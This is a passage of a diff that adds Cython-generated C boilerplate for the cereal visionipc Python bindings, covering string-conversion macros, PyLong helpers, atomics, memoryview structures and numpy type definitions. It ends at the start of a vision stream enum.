__PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "ascii" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* Header.proto */ +#if !defined(CYTHON_CCOMPLEX) + #if defined(__cplusplus) + #define CYTHON_CCOMPLEX 1 + #elif (defined(_Complex_I) && !defined(_MSC_VER)) || ((defined (__STDC_VERSION__) && __STDC_VERSION__ >= 201112L) && !defined(__STDC_NO_COMPLEX__)) + #define CYTHON_CCOMPLEX 1 + #else + #define CYTHON_CCOMPLEX 0 + #endif +#endif +#if CYTHON_CCOMPLEX + #ifdef __cplusplus + #include + #else + #include + #endif +#endif +#if CYTHON_CCOMPLEX && !defined(__cplusplus) && defined(__sun__) && defined(__GNUC__) + #undef _Complex_I + #define _Complex_I 1.0fj +#endif + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "cereal/visionipc/visionipc_pyx.pyx", + "", + "__init__.cython-30.pxd", + "type.pxd", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* ForceInitThreads.proto */ +#ifndef __PYX_FORCE_INIT_THREADS + #define __PYX_FORCE_INIT_THREADS 0 +#endif + +/* NoFastGil.proto */ +#define __Pyx_PyGILState_Ensure PyGILState_Ensure +#define __Pyx_PyGILState_Release PyGILState_Release +#define __Pyx_FastGIL_Remember() +#define __Pyx_FastGIL_Forget() +#define __Pyx_FastGilFuncInit() + +/* BufferFormatStructs.proto */ +struct __Pyx_StructField_; +#define __PYX_BUF_FLAGS_PACKED_STRUCT (1 << 0) +typedef struct { + const char* name; + struct __Pyx_StructField_* fields; + size_t size; + size_t arraysize[8]; + int ndim; + char typegroup; + char is_unsigned; + int flags; +} __Pyx_TypeInfo; +typedef struct __Pyx_StructField_ { + __Pyx_TypeInfo* type; + const char* name; + size_t offset; +} __Pyx_StructField; +typedef struct { + __Pyx_StructField* field; + size_t parent_offset; +} __Pyx_BufFmt_StackElem; +typedef struct { + __Pyx_StructField root; + __Pyx_BufFmt_StackElem* head; + size_t fmt_offset; + size_t new_count, enc_count; + size_t struct_alignment; + int is_complex; + char enc_type; + char new_packmode; + char enc_packmode; + char is_valid_array; +} __Pyx_BufFmt_Context; + +/* Atomics.proto */ +#include +#ifndef CYTHON_ATOMICS + #define CYTHON_ATOMICS 1 +#endif +#define __PYX_CYTHON_ATOMICS_ENABLED() CYTHON_ATOMICS +#define __pyx_atomic_int_type int +#define __pyx_nonatomic_int_type int +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__)) + #include +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ + (defined(_MSC_VER) && _MSC_VER >= 1700))) + #include +#endif +#if CYTHON_ATOMICS && (defined(__STDC_VERSION__) &&\ + (__STDC_VERSION__ >= 201112L) &&\ + !defined(__STDC_NO_ATOMICS__) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type atomic_int + #define __pyx_atomic_incr_aligned(value) atomic_fetch_add_explicit(value, 1, memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) atomic_fetch_sub_explicit(value, 1, memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C atomics" + #endif +#elif CYTHON_ATOMICS && (defined(__cplusplus) && (\ + (__cplusplus >= 201103L) ||\ +\ + (defined(_MSC_VER) && _MSC_VER >= 1700)) &&\ + ATOMIC_INT_LOCK_FREE == 2) + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type std::atomic_int + #define __pyx_atomic_incr_aligned(value) std::atomic_fetch_add_explicit(value, 1, std::memory_order_relaxed) + #define __pyx_atomic_decr_aligned(value) std::atomic_fetch_sub_explicit(value, 1, std::memory_order_acq_rel) + #if defined(__PYX_DEBUG_ATOMICS) && defined(_MSC_VER) + #pragma message ("Using standard C++ atomics") + #elif defined(__PYX_DEBUG_ATOMICS) + #warning "Using standard C++ atomics" + #endif +#elif CYTHON_ATOMICS && (__GNUC__ >= 5 || (__GNUC__ == 4 &&\ + (__GNUC_MINOR__ > 1 ||\ + (__GNUC_MINOR__ == 1 && __GNUC_PATCHLEVEL__ >= 2)))) + #define __pyx_atomic_incr_aligned(value) __sync_fetch_and_add(value, 1) + #define __pyx_atomic_decr_aligned(value) __sync_fetch_and_sub(value, 1) + #ifdef __PYX_DEBUG_ATOMICS + #warning "Using GNU atomics" + #endif +#elif CYTHON_ATOMICS && defined(_MSC_VER) + #include + #undef __pyx_atomic_int_type + #define __pyx_atomic_int_type long + #define __pyx_nonatomic_int_type long + #pragma intrinsic (_InterlockedExchangeAdd) + #define __pyx_atomic_incr_aligned(value) _InterlockedExchangeAdd(value, 1) + #define __pyx_atomic_decr_aligned(value) _InterlockedExchangeAdd(value, -1) + #ifdef __PYX_DEBUG_ATOMICS + #pragma message ("Using MSVC atomics") + #endif +#else + #undef CYTHON_ATOMICS + #define CYTHON_ATOMICS 0 + #ifdef __PYX_DEBUG_ATOMICS + #warning "Not using atomics" + #endif +#endif +#if CYTHON_ATOMICS + #define __pyx_add_acquisition_count(memview)\ + __pyx_atomic_incr_aligned(__pyx_get_slice_count_pointer(memview)) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_atomic_decr_aligned(__pyx_get_slice_count_pointer(memview)) +#else + #define __pyx_add_acquisition_count(memview)\ + __pyx_add_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) + #define __pyx_sub_acquisition_count(memview)\ + __pyx_sub_acquisition_count_locked(__pyx_get_slice_count_pointer(memview), memview->lock) +#endif + +/* MemviewSliceStruct.proto */ +struct __pyx_memoryview_obj; +typedef struct { + struct __pyx_memoryview_obj *memview; + char *data; + Py_ssize_t shape[8]; + Py_ssize_t strides[8]; + Py_ssize_t suboffsets[8]; +} __Pyx_memviewslice; +#define __Pyx_MemoryView_Len(m) (m.shape[0]) + +/* #### Code section: numeric_typedefs ### */ + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":731 + * # in Cython to enable them only on the right systems. + * + * ctypedef npy_int8 int8_t # <<<<<<<<<<<<<< + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + */ +typedef npy_int8 __pyx_t_5numpy_int8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":732 + * + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t # <<<<<<<<<<<<<< + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t + */ +typedef npy_int16 __pyx_t_5numpy_int16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":733 + * ctypedef npy_int8 int8_t + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t # <<<<<<<<<<<<<< + * ctypedef npy_int64 int64_t + * #ctypedef npy_int96 int96_t + */ +typedef npy_int32 __pyx_t_5numpy_int32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":734 + * ctypedef npy_int16 int16_t + * ctypedef npy_int32 int32_t + * ctypedef npy_int64 int64_t # <<<<<<<<<<<<<< + * #ctypedef npy_int96 int96_t + * #ctypedef npy_int128 int128_t + */ +typedef npy_int64 __pyx_t_5numpy_int64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":738 + * #ctypedef npy_int128 int128_t + * + * ctypedef npy_uint8 uint8_t # <<<<<<<<<<<<<< + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + */ +typedef npy_uint8 __pyx_t_5numpy_uint8_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":739 + * + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t # <<<<<<<<<<<<<< + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t + */ +typedef npy_uint16 __pyx_t_5numpy_uint16_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":740 + * ctypedef npy_uint8 uint8_t + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t # <<<<<<<<<<<<<< + * ctypedef npy_uint64 uint64_t + * #ctypedef npy_uint96 uint96_t + */ +typedef npy_uint32 __pyx_t_5numpy_uint32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":741 + * ctypedef npy_uint16 uint16_t + * ctypedef npy_uint32 uint32_t + * ctypedef npy_uint64 uint64_t # <<<<<<<<<<<<<< + * #ctypedef npy_uint96 uint96_t + * #ctypedef npy_uint128 uint128_t + */ +typedef npy_uint64 __pyx_t_5numpy_uint64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":745 + * #ctypedef npy_uint128 uint128_t + * + * ctypedef npy_float32 float32_t # <<<<<<<<<<<<<< + * ctypedef npy_float64 float64_t + * #ctypedef npy_float80 float80_t + */ +typedef npy_float32 __pyx_t_5numpy_float32_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":746 + * + * ctypedef npy_float32 float32_t + * ctypedef npy_float64 float64_t # <<<<<<<<<<<<<< + * #ctypedef npy_float80 float80_t + * #ctypedef npy_float128 float128_t + */ +typedef npy_float64 __pyx_t_5numpy_float64_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":755 + * # The int types are mapped a bit surprising -- + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t + */ +typedef npy_long __pyx_t_5numpy_int_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":756 + * # numpy.int corresponds to 'l' and numpy.long to 'q' + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t # <<<<<<<<<<<<<< + * ctypedef npy_longlong longlong_t + * + */ +typedef npy_longlong __pyx_t_5numpy_long_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":757 + * ctypedef npy_long int_t + * ctypedef npy_longlong long_t + * ctypedef npy_longlong longlong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_ulong uint_t + */ +typedef npy_longlong __pyx_t_5numpy_longlong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":759 + * ctypedef npy_longlong longlong_t + * + * ctypedef npy_ulong uint_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t + */ +typedef npy_ulong __pyx_t_5numpy_uint_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":760 + * + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t # <<<<<<<<<<<<<< + * ctypedef npy_ulonglong ulonglong_t + * + */ +typedef npy_ulonglong __pyx_t_5numpy_ulong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":761 + * ctypedef npy_ulong uint_t + * ctypedef npy_ulonglong ulong_t + * ctypedef npy_ulonglong ulonglong_t # <<<<<<<<<<<<<< + * + * ctypedef npy_intp intp_t + */ +typedef npy_ulonglong __pyx_t_5numpy_ulonglong_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":763 + * ctypedef npy_ulonglong ulonglong_t + * + * ctypedef npy_intp intp_t # <<<<<<<<<<<<<< + * ctypedef npy_uintp uintp_t + * + */ +typedef npy_intp __pyx_t_5numpy_intp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":764 + * + * ctypedef npy_intp intp_t + * ctypedef npy_uintp uintp_t # <<<<<<<<<<<<<< + * + * ctypedef npy_double float_t + */ +typedef npy_uintp __pyx_t_5numpy_uintp_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":766 + * ctypedef npy_uintp uintp_t + * + * ctypedef npy_double float_t # <<<<<<<<<<<<<< + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t + */ +typedef npy_double __pyx_t_5numpy_float_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":767 + * + * ctypedef npy_double float_t + * ctypedef npy_double double_t # <<<<<<<<<<<<<< + * ctypedef npy_longdouble longdouble_t + * + */ +typedef npy_double __pyx_t_5numpy_double_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":768 + * ctypedef npy_double float_t + * ctypedef npy_double double_t + * ctypedef npy_longdouble longdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cfloat cfloat_t + */ +typedef npy_longdouble __pyx_t_5numpy_longdouble_t; +/* #### Code section: complex_type_declarations ### */ +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< float > __pyx_t_float_complex; + #else + typedef float _Complex __pyx_t_float_complex; + #endif +#else + typedef struct { float real, imag; } __pyx_t_float_complex; +#endif +static CYTHON_INLINE __pyx_t_float_complex __pyx_t_float_complex_from_parts(float, float); + +/* Declarations.proto */ +#if CYTHON_CCOMPLEX && (1) && (!0 || __cplusplus) + #ifdef __cplusplus + typedef ::std::complex< double > __pyx_t_double_complex; + #else + typedef double _Complex __pyx_t_double_complex; + #endif +#else + typedef struct { double real, imag; } __pyx_t_double_complex; +#endif +static CYTHON_INLINE __pyx_t_double_complex __pyx_t_double_complex_from_parts(double, double); + +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionBuf; +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer; +struct __pyx_obj_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient; +struct __pyx_obj___Pyx_EnumMeta; +struct __pyx_array_obj; +struct __pyx_MemviewEnum_obj; +struct __pyx_memoryview_obj; +struct __pyx_memoryviewslice_obj; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":770 + * ctypedef npy_longdouble longdouble_t + * + * ctypedef npy_cfloat cfloat_t # <<<<<<<<<<<<<< + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t + */ +typedef npy_cfloat __pyx_t_5numpy_cfloat_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":771 + * + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t # <<<<<<<<<<<<<< + * ctypedef npy_clongdouble clongdouble_t + * + */ +typedef npy_cdouble __pyx_t_5numpy_cdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":772 + * ctypedef npy_cfloat cfloat_t + * ctypedef npy_cdouble cdouble_t + * ctypedef npy_clongdouble clongdouble_t # <<<<<<<<<<<<<< + * + * ctypedef npy_cdouble complex_t + */ +typedef npy_clongdouble __pyx_t_5numpy_clongdouble_t; + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":774 + * ctypedef npy_clongdouble clongdouble_t + * + * ctypedef npy_cdouble complex_t # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew1(a): + */ +typedef npy_cdouble __pyx_t_5numpy_complex_t; + +/* "cereal/visionipc/visionipc_pyx.pyx":24 + * + * + * cpdef enum VisionStreamType: # <<<<<<<<<<<<<< + * VISION_STREAM_ROAD + * VISION_STREAM_DRIVER + */ +enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType { + 